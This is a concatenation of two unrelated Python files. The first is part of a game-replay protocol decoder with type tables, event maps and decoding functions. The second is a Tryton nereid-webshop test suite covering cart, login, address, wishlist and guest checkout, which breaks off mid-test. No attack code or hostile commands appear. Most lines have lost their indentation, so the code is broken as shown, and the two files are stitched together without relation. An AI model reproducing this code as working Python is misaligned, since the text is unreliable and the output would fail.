('_struct',[[('m_transmissionId',87,-1)]]), #137
('_optional',[80]), #138
('_optional',[79]), #139
('_optional',[112]), #140
('_struct',[[('m_target',138,-6),('m_distance',139,-5),('m_pitch',139,-4),('m_yaw',139,-3),('m_reason',140,-2),('m_follow',13,-1)]]), #141
('_struct',[[('m_skipType',124,-1)]]), #142
('_int',[(0,11)]), #143
('_struct',[[('x',143,-2),('y',143,-1)]]), #144
('_struct',[[('m_button',6,-5),('m_down',13,-4),('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #145
('_struct',[[('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #146
('_struct',[[('m_achievementLink',79,-1)]]), #147
('_struct',[[('m_hotkey',6,-2),('m_down',13,-1)]]), #148
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_state',112,-1)]]), #149
('_struct',[[('m_soundtrack',6,-1)]]), #150
('_struct',[[('m_key',112,-2),('m_flags',112,-1)]]), #151
('_struct',[[('m_error',87,-2),('m_abil',95,-1)]]), #152
('_int',[(0,19)]), #153
('_struct',[[('m_decrementMs',153,-1)]]), #154
('_struct',[[('m_portraitId',87,-1)]]), #155
('_struct',[[('m_functionName',20,-1)]]), #156
('_struct',[[('m_result',87,-1)]]), #157
('_struct',[[('m_gameMenuItemIndex',87,-1)]]), #158
('_int',[(-32768,16)]), #159
('_struct',[[('m_wheelSpin',159,-2),('m_flags',112,-1)]]), #160
('_struct',[[('m_button',79,-1)]]), #161
('_struct',[[('m_cutsceneId',87,-2),('m_bookmarkName',20,-1)]]), #162
('_struct',[[('m_cutsceneId',87,-1)]]), #163
('_struct',[[('m_cutsceneId',87,-3),('m_conversationLine',20,-2),('m_altConversationLine',20,-1)]]), #164
('_struct',[[('m_cutsceneId',87,-2),('m_conversationLine',20,-1)]]), #165
('_struct',[[('m_leaveReason',1,-1)]]), #166
('_struct',[[('m_observe',24,-7),('m_name',9,-6),('m_toonHandle',121,-5),('m_clanTag',41,-4),('m_clanLogo',42,-3),('m_hijack',13,-2),('m_hijackCloneGameUserId',59,-1)]]), #167
('_optional',[83]), #168
('_struct',[[('m_state',24,-2),('m_sequence',168,-1)]]), #169
('_struct',[[('m_sequence',168,-2),('m_target',88,-1)]]), #170
('_struct',[[('m_sequence',168,-2),('m_target',89,-1)]]), #171
('_struct',[[('m_catalog',10,-4),('m_entry',79,-3),('m_field',9,-2),('m_value',9,-1)]]), #172
('_struct',[[('m_index',6,-1)]]), #173
('_struct',[[('m_shown',13,-1)]]), #174
('_struct',[[('m_recipient',12,-2),('m_string',30,-1)]]), #175
('_struct',[[('m_recipient',12,-2),('m_point',114,-1)]]), #176
('_struct',[[('m_progress',87,-1)]]), #177
('_struct',[[('m_status',24,-1)]]), #178
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_buttonLink',79,-1)]]), #179
('_struct',[[('m_behaviorLink',79,-2),('m_buttonLink',79,-1)]]), #180
('_choice',[(0,2),{0:('None',85),1:('Ability',179),2:('Behavior',180),3:('Vitals',159)}]), #181
('_struct',[[('m_announcement',181,-4),('m_announceLink',79,-3),('m_otherUnitTag',6,-2),('m_unitTag',6,-1)]]), #182
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2),('m_controlPlayerId',1,3),('m_upkeepPlayerId',1,4),('m_x',10,5),('m_y',10,6)]]), #183
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_x',10,2),('m_y',10,3)]]), #184
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_killerPlayerId',59,2),('m_x',10,3),('m_y',10,4),('m_killerUnitTagIndex',43,5),('m_killerUnitTagRecycle',43,6)]]), #185
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_controlPlayerId',1,2),('m_upkeepPlayerId',1,3)]]), #186
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2)]]), #187
('_struct',[[('m_playerId',1,0),('m_upgradeTypeName',29,1),('m_count',87,2)]]), #188
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1)]]), #189
('_array',[(0,10),87]), #190
('_struct',[[('m_firstUnitIndex',6,0),('m_items',190,1)]]), #191
('_struct',[[('m_playerId',1,0),('m_type',6,1),('m_userId',43,2),('m_slotId',43,3)]]), #192
('_struct',[[('m_key',29,0)]]), #193
('_struct',[[('__parent',193,0),('m_value',29,1)]]), #194
('_array',[(0,6),194]), #195
('_optional',[195]), #196
('_struct',[[('__parent',193,0),('m_value',87,1)]]), #197
('_array',[(0,6),197]), #198
('_optional',[198]), #199
('_struct',[[('m_eventName',29,0),('m_stringData',196,1),('m_intData',199,2),('m_fixedData',199,3)]]), #200
('_struct',[[('m_value',6,0),('m_time',6,1)]]), #201
('_array',[(0,6),201]), #202
('_array',[(0,5),202]), #203
('_struct',[[('m_name',29,0),('m_values',203,1)]]), #204
('_array',[(0,21),204]), #205
('_struct',[[('m_instanceList',205,0)]]), #206
]
# Map from protocol NNet.Game.*Event eventid to (typeid, name)
game_event_types = {
5: (78, 'NNet.Game.SUserFinishedLoadingSyncEvent'),
7: (77, 'NNet.Game.SUserOptionsEvent'),
9: (70, 'NNet.Game.SBankFileEvent'),
10: (72, 'NNet.Game.SBankSectionEvent'),
11: (73, 'NNet.Game.SBankKeyEvent'),
12: (74, 'NNet.Game.SBankValueEvent'),
13: (76, 'NNet.Game.SBankSignatureEvent'),
14: (81, 'NNet.Game.SCameraSaveEvent'),
21: (82, 'NNet.Game.SSaveGameEvent'),
22: (78, 'NNet.Game.SSaveGameDoneEvent'),
23: (78, 'NNet.Game.SLoadGameDoneEvent'),
25: (84, 'NNet.Game.SCommandManagerResetEvent'),
26: (92, 'NNet.Game.SGameCheatEvent'),
27: (98, 'NNet.Game.SCmdEvent'),
28: (106, 'NNet.Game.SSelectionDeltaEvent'),
29: (107, 'NNet.Game.SControlGroupUpdateEvent'),
30: (109, 'NNet.Game.SSelectionSyncCheckEvent'),
32: (110, 'NNet.Game.STriggerChatMessageEvent'),
34: (111, 'NNet.Game.SSetAbsoluteGameSpeedEvent'),
35: (113, 'NNet.Game.SAddAbsoluteGameSpeedEvent'),
36: (115, 'NNet.Game.STriggerPingEvent'),
37: (116, 'NNet.Game.SBroadcastCheatEvent'),
38: (117, 'NNet.Game.SAllianceEvent'),
39: (118, 'NNet.Game.SUnitClickEvent'),
40: (119, 'NNet.Game.SUnitHighlightEvent'),
41: (120, 'NNet.Game.STriggerReplySelectedEvent'),
43: (125, 'NNet.Game.SHijackReplayGameEvent'),
44: (78, 'NNet.Game.STriggerSkippedEvent'),
45: (128, 'NNet.Game.STriggerSoundLengthQueryEvent'),
46: (135, 'NNet.Game.STriggerSoundOffsetEvent'),
47: (136, 'NNet.Game.STriggerTransmissionOffsetEvent'),
48: (137, 'NNet.Game.STriggerTransmissionCompleteEvent'),
49: (141, 'NNet.Game.SCameraUpdateEvent'),
50: (78, 'NNet.Game.STriggerAbortMissionEvent'),
55: (127, 'NNet.Game.STriggerDialogControlEvent'),
56: (131, 'NNet.Game.STriggerSoundLengthSyncEvent'),
57: (142, 'NNet.Game.STriggerConversationSkippedEvent'),
58: (145, 'NNet.Game.STriggerMouseClickedEvent'),
59: (146, 'NNet.Game.STriggerMouseMovedEvent'),
60: (147, 'NNet.Game.SAchievementAwardedEvent'),
61: (148, 'NNet.Game.STriggerHotkeyPressedEvent'),
62: (149, 'NNet.Game.STriggerTargetModeUpdateEvent'),
64: (150, 'NNet.Game.STriggerSoundtrackDoneEvent'),
66: (151, 'NNet.Game.STriggerKeyPressedEvent'),
67: (156, 'NNet.Game.STriggerMovieFunctionEvent'),
76: (152, 'NNet.Game.STriggerCommandErrorEvent'),
86: (78, 'NNet.Game.STriggerMovieStartedEvent'),
87: (78, 'NNet.Game.STriggerMovieFinishedEvent'),
88: (154, 'NNet.Game.SDecrementGameTimeRemainingEvent'),
89: (155, 'NNet.Game.STriggerPortraitLoadedEvent'),
90: (157, 'NNet.Game.STriggerCustomDialogDismissedEvent'),
91: (158, 'NNet.Game.STriggerGameMenuItemSelectedEvent'),
92: (160, 'NNet.Game.STriggerMouseWheelEvent'),
95: (161, 'NNet.Game.STriggerButtonPressedEvent'),
96: (78, 'NNet.Game.STriggerGameCreditsFinishedEvent'),
97: (162, 'NNet.Game.STriggerCutsceneBookmarkFiredEvent'),
98: (163, 'NNet.Game.STriggerCutsceneEndSceneFiredEvent'),
99: (164, 'NNet.Game.STriggerCutsceneConversationLineEvent'),
100: (165, 'NNet.Game.STriggerCutsceneConversationLineMissingEvent'),
101: (166, 'NNet.Game.SGameUserLeaveEvent'),
102: (167, 'NNet.Game.SGameUserJoinEvent'),
103: (169, 'NNet.Game.SCommandManagerStateEvent'),
104: (170, 'NNet.Game.SCmdUpdateTargetPointEvent'),
105: (171, 'NNet.Game.SCmdUpdateTargetUnitEvent'),
106: (132, 'NNet.Game.STriggerAnimLengthQueryByNameEvent'),
107: (133, 'NNet.Game.STriggerAnimLengthQueryByPropsEvent'),
108: (134, 'NNet.Game.STriggerAnimOffsetEvent'),
109: (172, 'NNet.Game.SCatalogModifyEvent'),
110: (173, 'NNet.Game.SHeroTalentTreeSelectedEvent'),
111: (78, 'NNet.Game.STriggerProfilerLoggingFinishedEvent'),
112: (174, 'NNet.Game.SHeroTalentTreeSelectionPanelToggledEvent'),
}
# The typeid of the NNet.Game.EEventId enum.
game_eventid_typeid = 0
# Map from protocol NNet.Game.*Message eventid to (typeid, name)
message_event_types = {
0: (175, 'NNet.Game.SChatMessage'),
1: (176, 'NNet.Game.SPingMessage'),
2: (177, 'NNet.Game.SLoadingProgressMessage'),
3: (78, 'NNet.Game.SServerPingMessage'),
4: (178, 'NNet.Game.SReconnectNotifyMessage'),
5: (182, 'NNet.Game.SPlayerAnnounceMessage'),
}
# The typeid of the NNet.Game.EMessageId enum.
message_eventid_typeid = 1
# Map from protocol NNet.Replay.Tracker.*Event eventid to (typeid, name)
tracker_event_types = {
1: (183, 'NNet.Replay.Tracker.SUnitBornEvent'),
2: (185, 'NNet.Replay.Tracker.SUnitDiedEvent'),
3: (186, 'NNet.Replay.Tracker.SUnitOwnerChangeEvent'),
4: (187, 'NNet.Replay.Tracker.SUnitTypeChangeEvent'),
5: (188, 'NNet.Replay.Tracker.SUpgradeEvent'),
6: (183, 'NNet.Replay.Tracker.SUnitInitEvent'),
7: (189, 'NNet.Replay.Tracker.SUnitDoneEvent'),
8: (191, 'NNet.Replay.Tracker.SUnitPositionsEvent'),
9: (192, 'NNet.Replay.Tracker.SPlayerSetupEvent'),
10: (200, 'NNet.Replay.Tracker.SStatGameEvent'),
11: (206, 'NNet.Replay.Tracker.SScoreResultEvent'),
12: (184, 'NNet.Replay.Tracker.SUnitRevivedEvent'),
}
# The typeid of the NNet.Replay.Tracker.EEventId enum.
tracker_eventid_typeid = 2
# The typeid of NNet.SVarUint32 (the type used to encode gameloop deltas).
svaruint32_typeid = 7
# The typeid of NNet.Replay.SGameUserId (the type used to encode player ids).
replay_userid_typeid = 8
# The typeid of NNet.Replay.SHeader (the type used to store replay game version and length).
replay_header_typeid = 18
# The typeid of NNet.Game.SDetails (the type used to store overall replay details).
game_details_typeid = 40
# The typeid of NNet.Replay.SInitData (the type used to store the initial lobby).
replay_initdata_typeid = 69
def _varuint32_value(value):
# Returns the numeric value from a SVarUint32 instance.
for k, v in value.items():
return v
return 0
def _decode_event_stream(decoder, eventid_typeid, event_types, decode_user_id):
# Decodes events prefixed with a gameloop and possibly userid
gameloop = 0
while not decoder.done():
start_bits = decoder.used_bits()
# decode the gameloop delta before each event
delta = _varuint32_value(decoder.instance(svaruint32_typeid))
gameloop += delta
# decode the userid before each event
if decode_user_id:
userid = decoder.instance(replay_userid_typeid)
# decode the event id
eventid = decoder.instance(eventid_typeid)
typeid, typename = event_types.get(eventid, (None, None))
if typeid is None:
raise CorruptedError('eventid(%d) at %s' % (eventid, decoder))
# decode the event struct instance
event = decoder.instance(typeid)
event['_event'] = typename
event['_eventid'] = eventid
# insert gameloop and userid
event['_gameloop'] = gameloop
if decode_user_id:
event['_userid'] = userid
# the next event is byte aligned
decoder.byte_align()
# insert bits used in stream
event['_bits'] = decoder.used_bits() - start_bits
yield event
def decode_replay_game_events(contents):
"""Decodes and yields each game event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
game_eventid_typeid,
game_event_types,
decode_user_id=True):
yield event
def decode_replay_message_events(contents):
"""Decodes and yields each message event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
message_eventid_typeid,
message_event_types,
decode_user_id=True):
yield event
def decode_replay_tracker_events(contents):
"""Decodes and yields each tracker event from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
tracker_eventid_typeid,
tracker_event_types,
decode_user_id=False):
yield event
def decode_replay_header(contents):
"""Decodes and return the replay header from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(replay_header_typeid)
def decode_replay_details(contents):
"""Decodes and returns the game details from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(game_details_typeid)
def decode_replay_initdata(contents):
"""Decodes and return the replay init data from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
return decoder.instance(replay_initdata_typeid)
def decode_replay_attributes_events(contents):
"""Decodes and yields each attribute from the contents byte string."""
buffer = BitPackedBuffer(contents, 'little')
attributes = {}
if not buffer.done():
attributes['source'] = buffer.read_bits(8)
attributes['mapNamespace'] = buffer.read_bits(32)
count = buffer.read_bits(32)
attributes['scopes'] = {}
while not buffer.done():
value = {}
value['namespace'] = buffer.read_bits(32)
value['attrid'] = attrid = buffer.read_bits(32)
scope = buffer.read_bits(8)
value['value'] = buffer.read_aligned_bytes(4)[::-1].strip(b'\x00')
if scope not in attributes['scopes']:
attributes['scopes'][scope] = {}
if attrid not in attributes['scopes'][scope]:
attributes['scopes'][scope][attrid] = []
attributes['scopes'][scope][attrid].append(value)
return attributes
def unit_tag(unitTagIndex, unitTagRecycle):
return (unitTagIndex << 18) + unitTagRecycle
def unit_tag_index(unitTag):
return (unitTag >> 18) & 0x00003fff
def unit_tag_recycle(unitTag):
return (unitTag) & 0x0003ffff
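# A minimal decoding sketch. The archive handling is an assumption here:
# replay files are MPQ archives, and an external reader such as mpyq is
# needed to extract the individual event streams; the file name below is
# hypothetical.
if __name__ == '__main__':
    from mpyq import MPQArchive

    archive = MPQArchive('example.SC2Replay')
    contents = archive.read_file('replay.tracker.events')
    for event in decode_replay_tracker_events(contents):
        print(event['_event'], 'at gameloop', event['_gameloop'])
    # The unit tag helpers above round-trip an (index, recycle) pair:
    assert unit_tag_index(unit_tag(5, 2)) == 5
    assert unit_tag_recycle(unit_tag(5, 2)) == 2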
|
|
'''
Test Templates
:copyright: (c) 2014 by Openlabs Technologies & Consulting (P) LTD
:license: GPLv3, see LICENSE for more details
'''
import random
import unittest
from trytond.tests.test_tryton import USER, DB_NAME, CONTEXT
from trytond.transaction import Transaction
from test_base import BaseTestCase
from trytond.config import CONFIG
from decimal import Decimal
from nereid import request
CONFIG['smtp_from'] = 'from@xyz.com'
class TestTemplates(BaseTestCase):
"""
Test case for templates in nereid-webshop.
"""
def create_test_products(self):
# Create product templates with products
self._create_product_template(
'product 1',
[{
'category': self.category.id,
'type': 'goods',
'salable': True,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-1',
)
self._create_product_template(
'product 2',
[{
'category': self.category2.id,
'type': 'goods',
'salable': True,
'list_price': Decimal('20'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-2',
)
self._create_product_template(
'product 3',
[{
'category': self.category3.id,
'type': 'goods',
'list_price': Decimal('30'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-3',
)
self._create_product_template(
'product 4',
[{
'category': self.category3.id,
'type': 'goods',
'list_price': Decimal('30'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-4',
displayed_on_eshop=False
)
def _create_product_template(
self, name, vlist, uri, uom=u'Unit', displayed_on_eshop=True
):
"""
Create a product template with products and return the created template records.
:param name: Name of the product
:param vlist: List of dictionaries of values to create
:param uri: uri of product template
:param uom: Name of the UOM to use (note: the name, not the symbol or code)
:param displayed_on_eshop: Boolean field to display product
on shop or not
"""
# The used codes must persist across calls for the uniqueness check
# to mean anything, so keep them on the instance.
if not hasattr(self, '_code_list'):
self._code_list = []
code = random.choice('ABCDEFGHIJK')
while code in self._code_list:
code = random.choice('ABCDEFGHIJK')
self._code_list.append(code)
for values in vlist:
values['name'] = name
values['default_uom'], = self.Uom.search(
[('name', '=', uom)], limit=1
)
values['sale_uom'], = self.Uom.search(
[('name', '=', uom)], limit=1
)
values['products'] = [
('create', [{
'uri': uri,
'displayed_on_eshop': displayed_on_eshop,
'code': code,
}])
]
return self.ProductTemplate.create(vlist)
def cart(self, to_login):
"""
Checking cart functionality with and without login.
Used by test_0035_cart.
"""
qty = 7
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
self.create_test_products()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
with app.test_client() as c:
if to_login:
self.login(c, "email@example.com", "password")
rv = c.get('/cart')
self.assertEqual(rv.status_code, 200)
sales = self.Sale.search([])
self.assertEqual(len(sales), 0)
c.post(
'/cart/add',
data={
'product': product1.id,
'quantity': qty
}
)
rv = c.get('/cart')
self.assertEqual(rv.status_code, 200)
sales = self.Sale.search([])
self.assertEqual(len(sales), 1)
sale = sales[0]
self.assertEqual(len(sale.lines), 1)
self.assertEqual(
sale.lines[0].product, product1.products[0]
)
self.assertEqual(sale.lines[0].quantity, qty)
def test_0010_home_template(self):
"""
Test for home template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/')
self.assertEqual(rv.status_code, 200)
self.assertEqual(request.path, '/')
def test_0015_login(self):
"""
Test for login template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/login')
self.assertEqual(rv.status_code, 200)
rv2 = self.login(c, 'email@example.com', 'password')
self.assertIn('Redirecting', rv2.data)
self.assertTrue(rv2.location.endswith('localhost/'))
with self.assertRaises(AssertionError):
self.login(c, 'email@example.com', 'wrong')
def test_0020_registration(self):
"""
Test for registration template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/registration')
self.assertEqual(rv.status_code, 200)
data = {
'name': 'Registered User',
'email': 'regd_user@openlabs.co.in',
'password': 'password'
}
response = c.post('/registration', data=data)
self.assertEqual(response.status_code, 200)
data['confirm'] = 'password'
response = c.post('/registration', data=data)
self.assertEqual(response.status_code, 302)
def test_0025_nodes(self):
"""
Tests for nodes/subnodes.
Tests node properties.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
uom, = self.Uom.search([], limit=1)
values1 = {
'name': 'Product-1',
'category': self.category.id,
'type': 'goods',
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-1',
'displayed_on_eshop': True
}])
]
}
values2 = {
'name': 'Product-2',
'category': self.category.id,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-2',
'displayed_on_eshop': True
}, {
'uri': 'product-21',
'displayed_on_eshop': True
}])
]
}
values3 = {
'name': 'Product-3',
'category': self.category.id,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-3',
'displayed_on_eshop': True
}])
]
}
template1, template2, template3, = self.ProductTemplate.create([
values1, values2, values3
])
node1, = self.Node.create([{
'name': 'Node1',
'type_': 'catalog',
'slug': 'node1',
}])
self.assert_(node1)
node2, = self.Node.create([{
'name': 'Node2',
'type_': 'catalog',
'slug': 'node2',
'display': 'product.template',
}])
node3, = self.Node.create([{
'name': 'Node3',
'type_': 'catalog',
'slug': 'node3',
}])
self.Node.write([node2], {
'parent': node1
})
self.Node.write([node3], {
'parent': node2
})
# Create Product-Node relationships.
self.ProductNodeRelationship.create([{
'product': pro,
'node': node1,
} for pro in template1.products])
self.ProductNodeRelationship.create([{
'product': pro,
'node': node2,
} for pro in template2.products])
self.ProductNodeRelationship.create([{
'product': pro,
'node': node3,
} for pro in template3.products])
app = self.get_app()
for node in [node1, node2, node3]:
self.assert_(node)
self.assertEqual(node2.parent, node1)
with app.test_client() as c:
rv = c.get('/nodes/{0}/{1}'.format(node1.id, node1.slug))
self.assertEqual(rv.status_code, 200)
url = 'nodes/{0}/{1}/{2}'.format(
node2.id, node2.slug, 1
)
rv = c.get(url)
self.assertEqual(rv.status_code, 200)
def test_0030_articles(self):
"""
Tests the rendering of an article.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
article, = self.Article.search([
('uri', '=', 'test-article')
])
categ, = self.ArticleCategory.search([
('title', '=', 'Test Categ')
])
self.assertEqual(len(categ.published_articles), 0)
self.Article.publish([article])
self.assertEqual(len(categ.published_articles), 1)
with app.test_client() as c:
response = c.get('/article/test-article')
self.assertEqual(response.status_code, 200)
self.assertIn('Test Content', response.data)
self.assertIn('Test Article', response.data)
def test_0035_cart(self):
"""
Test the cart.
"""
for to_login in [True, False]:
print("Login?: {0}".format(to_login))
self.cart(to_login)
def test_0040_addresses(self):
"""
Test addresses.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/view-address')
self.assertEqual(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
rv = c.get('/view-address')
self.assertEqual(rv.status_code, 200)
# Creating an address
rv = c.get('/create-address')
self.assertEqual(rv.status_code, 200)
data = {
'name': 'Some Dude',
'street': 'Test Street',
'zip': 'zip',
'city': 'city',
'email': 'email@example.com',
'phone': '123456789',
'country': self.available_countries[0].id,
'subdivision': self.Country(
self.available_countries[0]
).subdivisions[0].id
}
# Check that there are zero addresses before posting.
self.assertEqual(
len(self.registered_user.party.addresses),
0
)
response = c.post(
'/create-address',
data=data
)
self.assertEqual(response.status_code, 302)
# Check that our address info is present in template data.
address, = self.registered_user.party.addresses
rv = c.get('/view-address')
self.assertIn(data['name'], rv.data)
self.assertIn(data['street'], rv.data)
self.assertIn(data['city'], rv.data)
self.assertEqual(rv.status_code, 200)
self.assertEqual(
len(self.registered_user.party.addresses),
1
)
# Now edit some bits of the address and view it again.
rv = c.get('/edit-address/{0}'.format(address.id))
self.assertEqual(rv.status_code, 200)
response = c.post(
'/edit-address/{0}'.format(address.id),
data={
'name': 'Some Other Dude',
'street': 'Street',
'streetbis': 'StreetBis',
'zip': 'zip',
'city': 'City',
'email': 'email@example.com',
'phone': '1234567890',
'country': self.available_countries[0].id,
'subdivision': self.Country(
self.available_countries[0]).subdivisions[0].id,
}
)
self.assertEqual(response.status_code, 302)
rv = c.get('/view-address')
self.assertIn('Some Other Dude', rv.data)
with self.assertRaises(AssertionError):
self.assertIn(data['name'], rv.data)
# Now remove the address.
rv = c.post(
'/remove-address/{0}'
.format(address.id)
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.party.addresses),
0
)
def test_0045_wishlist(self):
"""
Tests the wishlist.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
with app.test_client() as c:
# Guests will be redirected.
rv = c.post(
'/wishlists',
data={
'name': 'Testlist'
}
)
self.assertEqual(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
# No wishlists currently.
self.assertEqual(
len(self.registered_user.wishlists),
0
)
rv = c.post(
'/wishlists',
data={
'name': 'Testlist'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists),
1
)
rv = c.get('/wishlists')
self.assertIn('Testlist', rv.data)
# Remove this wishlist.
rv = c.delete(
'/wishlists/{0}'.format(
self.registered_user.wishlists[0].id
)
)
self.assertEqual(rv.status_code, 200)
# Now add products.
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
# Adding a product without creating a wishlist
# creates a wishlist automatically.
rv = c.post(
'wishlists/products',
data={
'product': product1.products[0].id,
'action': 'add'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(len(self.registered_user.wishlists), 1)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
1
)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertIn(product1.name, rv.data)
# Add another product.
rv = c.post(
'wishlists/products',
data={
'product': product2.products[0].id,
'action': 'add',
'wishlist': self.registered_user.wishlists[0].id
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
2
)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertIn(product2.name, rv.data)
# Remove a product
rv = c.post(
'wishlists/products',
data={
'product': product2.products[0].id,
'wishlist': self.registered_user.wishlists[0].id,
'action': 'remove'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
1
)
rv = c.get(
'/wishlists/{0}'
.format(self.registered_user.wishlists[0].id)
)
self.assertNotIn(product2.name, rv.data)
@unittest.skip("Not implemented yet.")
def test_0050_profile(self):
"""
Test the profile.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
# Without login.
rv = c.get('/me')
self.assertEqual(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
rv = c.post(
'/me',
data={
'display_name': 'Pritish C',
'timezone': 'Asia/Kolkata'
}
)
self.assertEqual(rv.status_code, 302)
rv = c.get('/me')
self.assertIn('Pritish C', rv.data)
self.assertIn('Asia/Kolkata', rv.data)
def test_0055_guest_checkout(self):
"""
Test for guest checkout.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
country = self.Country(self.available_countries[0])
subdivision = country.subdivisions[0]
with app.test_client() as c:
rv = c.post(
'/cart/add',
data={
'product': product1.products[0].id,
'quantity': 5
}
)
self.assertEqual(rv.status_code, 302)
rv = c.get('/checkout/sign-in')
self.assertEqual(rv.status_code, 200)
# Trying to checkout with a registered email.
# Should fail.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'email@example.com'
}
)
self.assertEqual(rv.status_code, 200)
self.assertIn(
'{0}'.format(self.registered_user.email),
rv.data
)
self.assertIn(
'is tied to an existing account',
rv.data
)
# Now with a new email.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'new@example.com',
'checkout_mode': 'guest'
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/shipping-address')
)
# Shipping address page should render.
rv = c.get('/checkout/shipping-address')
self.assertEqual(rv.status_code, 200)
# Copied from nereid-checkout - adding shipping address.
rv = c.post(
'/checkout/shipping-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/validate-address')
)
# Copied from nereid-checkout - adding billing address.
rv = c.post(
'/checkout/billing-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/payment')
)
with Transaction().set_context(company=self.company.id):
self._create_auth_net_gateway_for_site()
# Try to pay using credit card
rv = c.post(
'/checkout/payment',
data={
'owner': 'Joe Blow',
'number': '4111111111111111',
'expiry_year': '2018',
'expiry_month': '01',
'cvv': '911',
'add_card_to_profiles': 'y',
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue('/order/' in rv.location)
self.assertTrue('access_code' in rv.location)
sale, = self.Sale.search([('state', '=', 'confirmed')])
payment_transaction, = sale.gateway_transactions
self.assertEqual(payment_transaction.amount, sale.total_amount)
rv = c.get('/order/{0}'.format(sale.id))
self.assertEqual(rv.status_code, 302) # Orders page redirect
def test_0060_registered_checkout(self):
"""
Test for registered user checkout.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
country = self.Country(self.available_countries[0])
subdivision = country.subdivisions[0]
with app.test_client() as c:
rv = c.post(
'/cart/add',
